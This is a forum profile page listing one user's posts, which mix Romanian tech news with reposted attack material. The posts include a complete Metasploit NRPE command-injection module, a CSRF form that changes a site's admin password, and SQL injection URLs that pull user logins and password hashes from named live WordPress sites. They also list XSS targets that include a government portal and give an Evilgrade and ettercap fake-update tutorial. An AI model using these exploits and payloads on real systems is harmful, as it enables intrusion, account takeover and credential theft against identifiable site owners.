Jump to content

Kwelwild

Active Members
  • Posts

    638
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Kwelwild

  1. O parte dintre utilizatorii Google au pierdut accesul la email si documente Probleme pentru mai multi detinatori de conturi pe Google, care s-au trezit ieri seara ca nu isi pot accesa emailul si documentele. Daily Mail scrie ca gigantul Google s-a confruntat aseara cu cateva probleme tehnice, care au impiedicat accesul unor utilizatori la serviciile de email si documente. Google inca investigheaza problema si nu poate sa-si explice ce s-a intamplat in realitate. Pritre serviciile picate s-au numarat Gmail, Google Docs, dar si alte 11 aplicatii, oficialii Google anuntand utilizatorii ca "lucreaza pentru a readuce serviciile la normalitate". In ciuda problemelor, numai 0.007 dintre detinatorii de Gmail au resimtit erorile. Sursa: O parte dintre utilizatorii Google au pierdut accesul la email si documente - www.yoda.ro
  2. Bravo, asa da! Vad ca mai sunt si oameni care scotocesc prin site-uri mari, decat cei cu site-uri de imobiliare. Felicitari!
  3. Pirate Bay revine in Suedia, dupa incercarea esuata de a fugi de autoritati Cel mai mare site de torrente din lume trece printr-o perioada extrem de dificila. Cei de la Pirate Bay au fost obligati sa revina in Suedia din Groenlanda, unde au incercat sa se stabileasca recent. Pentru a evita inchiderea site-ului, detinatorii The Pirate Bay au decis sa-l mute din Suedia in Groenlanda, insa planul lor a fost dat peste cap in momentul in care administratorii domeniilor ".gl" au blocat orice activitate Pirate Bay, conform deciziei Curtii Supreme Daneze, scrie ZF.ro. In acest moment, The Pirate Bay a revenit la adresa ".se", insa Torrent Freak noteaza ca decizia ar putea fi doar temporara, pana la gasirea unei noi alternative. Sursa: Pirate Bay revine in Suedia, dupa incercarea esuata de a fugi de autoritati - www.yoda.ro
  4. Vbulletin 5.0 Sqli Exploitation Manual Tutorial | Automated Injector/Data Extractor Demonstration Description: This video shows how to exploit VBulletin 5.0 manually with sql injection vulnerability presented in almost all VBulletin 5.0 Beta upto 28 and to do automatic injection/extraction as well with automated injector ( data extractor ) coded by Xception Code. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Vbulletin 5.0 Sqli Exploitation Manual Tutorial | Automated Injector/Data Extractor Demonstration |
  5. Description: This video shows how to do back connection through a server to your system with PHP Reverse Shell and also shows how to use PHP Meterpreter Shell. Video Created By : Shubham Raj ( Xception Code ) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Back Connection With Reverse Shell | Php Meterpreter Shell
  6. http://www.youtube.com/watch?feature=player_embedded&v=c-9IIfgVgCc Description: This exploit will present malicious files on a server and once we entice the victim to visit ourserver and open our file he will be injected with our malicious dll and we can have our payload running. The webdav dll hijacker is located at exploits/windows/browser/webdav_dll_hijacking. Next set your payload as a windows/meterpreter/reverse_tcp and set the local host and the local port. In here I used the extension as ppt. Well once you enter exploit metasploit will start the server and once the victim visits our server he should see a powerpoint presentation in our case. When he opens it we should get our payload working. To learn more about DLL security read this: Dynamic-Link Library Security (Windows) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: WebDAV DLL Hijacking - YouTube Sursa: Webdav Dll Hijacking Tutorial
  7. Folosesc BackTrack 5 r2..mi se pare destul de bun pentru Pentesting si nu numai pentru asta, iar r3 mi s-a parut a avea mici erori.
  8. Free Monthly Websites 2.0 - Admin Password Change ========================================================================================== # Title : Free Monthly Websites 2.0 Administrator Remote Password Change # Date : 10/04/2013 # Name : Free Monthly Websites # Affected Version : 2.0 # Vendor : http://www.freemonthlywebsites2.com/ # Category : Web applications # Severity : High # Tested on : Firefox | Google Chrome | Internet Explorer # Dorks : inurl:/index_ebay.php | "Powered by: Resell Rights Fortune" | Powered By: Free Monthly Websites 2.0 # About the software : Free Monthly Websites 2.0 is here and you no longer have to worry about editing complicated HTML code as we have taken care of that for you, and you no longer have to worry about anything to do with website design as we have taken care of that for you too, adding your Google AdSense Publisher code, taken care of, ClickBank! All done for you, here's how it works. (taken from the vendor's page) ========================================================================================== # Author : Yassin Aboukir # Contact : Yaaboukir [At] Gmail [Dot] com # Site : www.y-aboukir.info # Greetz : To All Ethical Hackers! ========================================================================================== # Proof of concept : Vulnerable page : http://target.com/[path]/admin/file_io.php <form name="frm" action="file_io.php" method="post" onSubmit="return chk()"> <input type="hidden" name="do_type" value="admin_settings_write"> # How to exploit : - Change http://www.target.com/[path]/ to the link of target website. <html> <head><title>Free Monthly Websites 2.0 | Remote Admin password Change</title></head> <body> <td width="645" align="center" valign="top"><table width="645" border="0" align="center" cellpadding="0" cellspacing="0"> <form name="frm" action="http://www.target.com/[path]/admin/file_io.php" method="post" onSubmit="return chk()"> <input type="hidden" name="do_type" value="admin_settings_write"> <tr> <td height="100" colspan="2" align="center" valign="middle"> <font color="#808080"><b><font size="5">Free Monthly Websites 2.0 |</font><font size="6"> </font></b> <font size="4">Remote Admin password Change</font></font></td> </tr> <tr> <td width="300" height="50" align="center" valign="middle"> <font color="#808080">New Username:</font> </td> <td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40"> </td> </tr> </td> <tr> <td width="300" height="62" align="center" valign="middle"> <font color="#808080">New Password: </font> </td> <td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40"> </td> </tr> <tr> <td height="50" colspan="2" align="center" valign="middle" ><p> <input type="submit" name="Submit" value="Save" style="font-weight: 700"><br> </td> </tr> <tr> <td height="50" colspan="2" align="center" valign="middle" class="main2"><p>Author<b> : </b> <a href="http://www.y-aboukir.info/" style="text-decoration: none"> <font color="#000000">Yassin ABOUKIR</font></a></p></td> </tr> </body> <html> Sursa: Free Monthly Websites 2.0 - Admin Password Change
  9. Nagios Remote Plugin Executor Arbitrary Command Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## # require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution', 'Description' => %q{ The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands. }, 'Author' => [ 'Rudolph Pereir', # Vulnerability discovery 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module ], 'References' => [ [ 'CVE', '2013-1362' ], [ 'OSVDB', '90582'], [ 'BID', '58142'], [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability'] ], 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'perl python ruby bash telnet', # *_perl, *_python and *_ruby work if they are installed } }, 'Targets' => [ [ 'Nagios Remote Plugin Executor prior to 2.14', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 21 2013' )) register_options( [ Opt::RPORT(5666), OptEnum.new('NRPECMD', [ true, "NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg", 'check_procs', ['check_procs', 'check_users', 'check_load', 'check_disk'] ]), # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below OptBool.new('NRPESSL', [ true, "Use NRPE's Anonymous-Diffie-Hellman-variant SSL ", true]) ], self.class) end def send_message(message) packet = [ 2, # packet version 1, # packet type, 1 => query packet 0, # checksum, to be added later 0, # result code, discarded for query packet message, # the command and arguments 0 # padding ] packet[2] = Zlib::crc32(packet.pack("nnNna1024n")) # calculate the checksum begin self.sock.put(packet.pack("nnNna1024n")) #send the packet res = self.sock.get_once # get the response rescue ::EOFError => eof res = "" end return res.unpack("nnNnA1024n")[4] unless res.nil? end def setup @ssl_socket = nil @force_ssl = false super end def exploit if check != Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotFound, "Host does not support plugin command line arguments or is not accepting connections") end stage = "setsid nohup #{payload.encoded} & " stage = Rex::Text.encode_base64(stage) # NRPE will reject queries containing |`&><'\"\\[]{}; but not $() command = datastore['NRPECMD'] command << "!" command << "$($(rm -f /tmp/$$)" # Delete the file if it exists # need a way to write to a file without using redirection (>) # cant count on perl being on all linux hosts, use GNU Sed # TODO: Probably a better way to do this, some hosts may not have a /tmp command << "$(cp -f /etc/passwd /tmp/$$)" # populate the file with at least one line of text command << "$(sed 1i#{stage} -i /tmp/$$)" # prepend our stage to the file command << "$(sed q -i /tmp/$$)" # delete the rest of the lines after our stage command << "$(eval $(base64 -d /tmp/$$) )" # decode and execute our stage, base64 is in coreutils right? command << "$(kill -9 $$)" # kill check_procs parent (popen'd sh) so that it never executes command << "$(rm -f /tmp/$$))" # clean the file with the stage connect print_status("Sending request...") send_message(command) disconnect end def check print_status("Checking if remote NRPE supports command line arguments") begin # send query asking to run "fake_check" command with command substitution in arguments connect res = send_message("__fake_check!$()") # if nrpe is configured to support arguments and is not patched to add $() to # NASTY_META_CHARS then the service will return: # NRPE: Command '__fake_check' not defined if res =~ /not defined/ return Exploit::CheckCode::Vulnerable end # Otherwise the service will close the connection if it is configured to disable arguments rescue EOFError => eof return Exploit::CheckCode::Safe rescue Errno::ECONNRESET => reset unless datastore['NRPESSL'] or @force_ssl print_status("Retrying with ADH SSL") @force_ssl = true retry end return Exploit::CheckCode::Safe rescue => e return Exploit::CheckCode::Unknown end # TODO: patched version appears to go here return Exploit::CheckCode::Unknown end # NRPE uses unauthenticated Annonymous-Diffie-Hellman # setting the global SSL => true will break as we would be overlaying # an SSLSocket on another SSLSocket which hasnt completed its handshake def connect(global = true, opts={}) self.sock = super(global, opts) if datastore['NRPESSL'] or @force_ssl ctx = OpenSSL::SSL::SSLContext.new("TLSv1") ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE ctx.ciphers = "ADH" @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx) @ssl_socket.connect self.sock.extend(Rex::Socket::SslTcp) self.sock.sslsock = @ssl_socket self.sock.sslctx = ctx end return self.sock end def disconnect @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl super end end Sursa: Nagios Remote Plugin Executor Arbitrary Command Execution
  10. Description: What is Evilgrade? Evilgrade is a framework written in perl which makes attackers make benefit out of underprivileged upgrades by injecting fake updates in the sense tricking the victim and enticing him to download our malicious payload. For this rationale we can use combinations such as Man-in-the-middle (MITM) attack or DNS Spoofing. (There can be more attacks as well). In this tutorial I will make the backdoor separately using msfvenom.(You can also make evilgrade to create the metasploit backdoor). Next I will launch evilgrade is located at /pentest/exploits/isr-evilgrade. As you will see evilgrade got several modules such as winzip, orbit, ccleaner, sunjava, etc. For this demonstration I will Use notepadplus. To load the module type ‘configure notepadplus’. Next we have to set the agent like this. Set agent ‘[“<%OUT%>/root/backdoor.exe<%OUT%>”]’ In here the <%OUT%> tag points to the location where the output file should be located. Our dynamic fake update binary is in between double brackets ‘[]’. Make sure you entered correctly by typing show options. Once you see the options of this module you should see URL which the software retrieves the update from. Copy that because we are going to spoof it and perform a MITM attack. Well add that URL in the /usr/local/share/ettercap/etter.dns giving A record. So I won’t be explaining about DNS spoofing here, In short I will describe here in few lines. I will use ettercap for this. Ettercap –T –Q -M arp –P dns_spoof /gatewayip/ /victimip/ -T for text mode, -Q for super quiet mode, -P for plugin, -M for performing a MITM attack. After successfully running ettercap you can go ahead and use multi/handler exploit for handling the exploits outside the framework and start listening on the given payload with the local host and port. Make sure you enter ‘start’ in evilgrade. Once the user opens notepadplus and updates he should receive our malicious payload and a successful meterpreter should be created. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Hacking With Evilgrade
  11. Description: [Please Watch video HD , for better result.] Ability FTP server suffering from stack base buffer overflow, this demonstration show you the easiest way through steps This demonstration is part from: Buffer Overflow tutorial -- Part 2: Basic Stack Overflow: Buffer Overflow tutorial – Part 2: Stack Based Overflow : ????? ??????? ?????? To download BoF-Kit: https://github.com/KINGSABRI/BufferOverflow-Kit ????? ??????? ?????? Sursa: Buffer Overflow | Direct Stack Base: Ability Server Exploit
  12. Google ofera utilizatorilor posibilitatea de a-si programa stergerea datelor Cu "Inactive Account", datele de pe YouTube, Gmail si Google+ pot fi programate pentru stergere cu trei, sase sau douasprezece luni inainte. Gigantul Google a lansat aplicatia online "Inactive Account" pentru a preveni ca datele utilizatorilor sa fie folosite dupa ce acestia nu-si mai acceseaza conturile serviciilor oferite. Mai clar, daca un utilizator dispare (se include si moartea la categoria "disparitii") nu va mai exista riscul ca informatiile despre acesta sa ajunga la terte persoane. "Stim ca nu foarte multi dintre noi se gandesc la moarte, mai ales la cea proprie. Cu toate acestea, sa rezolvi problema datelor tale dupa ce dispari este de o importanta maxima", spune Andreas Tuerk, product manager la Google. Pentru a nu exista probleme cu aplicatia, gigantul american trimite un email utilizatorilor care si-au programat stergerea datelor cu exact o luna inainte de data limita. Totusi, utilizatorii nu iau foarte in serios noua aplicatie, unul dintre nemultumiti chiar a trimis un email prin care cere Google imformatii despre posibilitatea de a posta si de pe lumea cealalta. Sursa: Google ofera utilizatorilor posibilitatea de a-si programa stergerea datelor - www.yoda.ro
  13. Bine ai venit, care este talentul tau?
  14. Felicitari, sa postezi si suma primita
  15. Adevaratul motiv pentru care Yahoo a platit 30 milioane de dolari pentru soft-ul unui programator de 17 ani Lui Nick i-a venit ideea sa creeze o asemenea aplicatie pentru smartphone-uri pe cand studia pentru examene. Se intampla in 2011 cand realiza ca, atatea click-uri pe diferite pagini pentru a-si lua informatiile de care avea nevoie, era ineficient si, totodata, o pierdere de vreme. "Mi-am dat seama ca toate aceste informatii nu sunt corect dispuse. Atunci mi-a venit ideea unui algoritm care sa faca un rezumat, in mod automat, oricarui articol, indiferent de lungime, in numai trei paragrafe", spunea Nick D’Aloisio. Toata aceasta afacere il transforma pe D’Aloisio intr-unul dintre cei mai tineri milionari din lume din domeniul tehnologiei. Multi au privit insa cu scepticism cumpararea software-ului de catre Yahoo, avand in vedere ca Summly nu avea multi utilizatori si nici nu aducea incasari, noteaza Business Insider. Mai mult, Summly nici macar nu a fost creat de un geniu din IT, ci de compania britanica Somo, “cea mai mare agentie independenta pentru marketingul mobil din Marea Britanie”, scriu jurnalistii americani. Totodata, pe site-ul de prezentare a aplicatiei Summly scrie ca tehnologia folosita a fost dezvoltata de organizatia SRI International, aceeasi care a creat-o si pe Siri, cunoscuta asistenta virtuala cumparata apoi de gigantul Apple. Si atunci, care adevaratul motiv pentru care Marissa Mayer, CEO-ul Yahoo, ar fi aprobat o achizitie costisitoare, care nu ii aducea practic niciun avantaj? Surse citate de Business Insider au declarat ca Summly este, de fapt, o mica parte dintr-un targ pe care Yahoo l-a facut cu cei de la SRI, targ ce presupunea un transfer de informatii, coduri si IP-uri. Practic, Summly a venit la pachet cu toate aceste lucruri, iar Yahoo nu a facut decat sa profite de pe urma publicitatii iscate. O sursa apropiata discutiilor a declarat ca “tehnologia” va fi un pas urias pentru Yahoo, putand ajuta la crearea de news feeds personalizat pe platformele mobile. Marissa Mayer crede in succesul acestui sistem, in special datorita faptului ca telefoanele mobile au ecrane mai mici si prezentarea informatiei intr-un format cat mai compact ar putea fi un real folos. Cu toate astea, sarcina de a implementa noua tehnologie nu va reveni nimanui din echipa Summly, nici macar directorului sau general de doar 17 ani. Nick D’Aloisio ar fi dezvoltat codul primar care sta la baza aplicatiei, insa lucrurile nu sunt foarte clare. Asadar, D’Aloisio ar putea fi vazut curand luptandu-se cu gigantii industriei, insa, pentru moment, implicarea lui in proiectele Yahoo este destul de limitata. Sursa: Adevaratul motiv pentru care Yahoo a platit 30 milioane de dolari pentru soft-ul unui programator de 17 ani - www.InCont.ro
  16. WordPress Spider Video Player third party plugin version 2.1 suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data. ############## # Exploit Title : Wordpress Spider Video Player plugin SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # Plugin Link : http://web-dorado.com/ # # Home : www.ashiyane.org # # Security Risk : High # # Version : 2.1 # # Dork : inurl:wp-content/plugins/player/settings.php?playlist= # # Tested on: Linux # ############## #Location:site/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL] # # #DEm0: # http://www.voyager-channel.org/wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users-- # # http://juanmontoyalopez.es/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=-6+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users-- # # http://tremendum.org/wp-content/plugins/player/settings.php?playlist=1&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users-- # # http://generalcapitalinvestments.com/wp-content/plugins/player/settings.php?playlist=1&theme=-4+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users-- # # http://www.lancssa.com/wp-content/plugins/player/settings.php?playlist=2&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users-- # ############## #Greetz to: My Lord ALLAH ############## # # Amirh03in # ############## Sursa: WordPress Spider Video Player 2.1 SQL Injection ? Packet Storm
  17. Description: Impersonating CAPTCHA Providers reCAPTCHA and other CAPTCHA service providers validate millions of CAPTCHAs each day and protect thousands of websites against the intertube bots. A secure CAPTCHA generation and validation ecosystem forms the basis of the mutual trust model and large scale damage can happen if any component of this ecosystem is compromised. The presentation explains third party CAPTCHA provider integration and discusses vulnerabilites that affect almost every CAPTCHA provider including reCAPTCHA. These vulnerabilites can be exploited to impersonate CAPTCHA providers and bypass the protection offered by CAPTCHA providers. A signature based tool clipcaptcha will be demonstrated which can be used to impersonate CAPTCHA providers and to bypass CAPTCHA provider protection. clipcaptcha's operational modes will also be demonstrated. Gursev Singh Kalra serves as a Principal Consultant with Foundstone Professional Services, a division of McAfee. Gursev has done extensive security research on CAPTCHA schemes and implementations. He has written a Visual CAPTCHA Assessment tool, TesserCap that was voted among the top ten web hacks of 2011. His OData research and CAPTCHA Re-Riding attacks were voted among top ten web hacking techniques of 2012. He has also developed open source SSL Cipher enumeration tool SSLSmart, OData assessment tool Oyedata and CAPTCHA Provider Impersonation Tool ClipCaptcha. He has spoken at conferences like BlackHat, ToorCon, OWASP, NullCon, Infosec Southwest, etc. Sursa: http://www.securitytube.net/video/7308
  18. Kwelwild

    Salut

    Bine ai venit. OFF: Sa inveti despre atacurile DDoS? Pentru asta vorbeste cu Lozls )
  19. La multi ani, alecseu!
  20. WordPress Traffic Analyzer third-party plugin suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data. ################################################################################ # # Exploit Title : WordPress Trafficanalyzer Plugin XSS Vulnerability # # Author : IrIsT.Ir # # Discovered By : Beni_Vanda # # Home : http://IrIsT.Ir/en/ # # Software Link : http://wptrafficanalyzer.in # # Security Risk : Medium # # Version : All Version # # Tested on : GNU/Linux (Ubuntu/BT/Fedora) - win7 # # Dork : inurl:js/ta_loaded.js.php?aoid= # ################################################################################ # # Expl0iTs : # # http://target/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss] # # # D3mo : # # http://www.nldtrondheim.net/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss] # http://brussac.lagalite.net/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss] # http://gym-n-kydon.chan.sch.gr/sxoleio/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss] # http://www.doe.gov.my/portal/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss] # http://valkunas.ftmc.lt/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[xss] # ################################################################################ # # Greats : Am!r - C0dex - B3HZ4D - TaK.FaNaR - Dead.Zone - 0x0ptim0us - skote_vahshat # # black_king - Mr.XHat - m3hdi - F@rid - Dr.Tofan - Dj.TiniVini - () - sajjad11&13 # # MR.AN0NYM - Silent - Dr.Koderz - Z3r0 - Mr.Zer0 - Megatron - x3o-1337 - asesino04 # # Sukhoi Su-37 - Cyber_Injection - Smart_Programmer - IR Anonymous && # # All Members In Www.IrIsT.Ir/forum # ################################################################################ Sursa: WordPress Traffic Analyzer Cross Site Scripting ? Packet Storm
  21. Abusing Windows Remote Management (Winrm) With Metasploit Description: In this technical webinar Devid Maloney talking about how you can exploit WinRM services using Metasploit Framework so what you will learn: • Capabilities of Windows Remote Management (WinRM) and Windows Remote Shell (WinRS) • Discovering hosts running these services • Brute forcing the services to obtain passwords • Running WMI Queries and running commands • Getting and migrating shells to a more persistent process and more. About David Maloney: David Maloney, a Software Engineer on Rapid7's Metasploit team, is responsible for development of core features for the commercial Metasploit editions. Before Rapid7, he worked as a Security Engineer and Penetration Tester at Time Warner Cable and as an Application Security Specialist for a global insurance company. David has been a long-time community contributor to the Metasploit Framework. He is one of the founders of Hackerspace Charlotte and is an avid locksport enthusiast. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Abusing Windows Remote Management (Winrm) With Metasploit
  22. Force A Wpa-Handshake (Dos-Attack)/Break Wpa Encryption Description: Force a WPA-Handshake (DoS-Attack)/Break WPA Encryption Credits: danielhaake.de Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Force A Wpa-Handshake (Dos-Attack)/Break Wpa Encryption
×
×
  • Create New...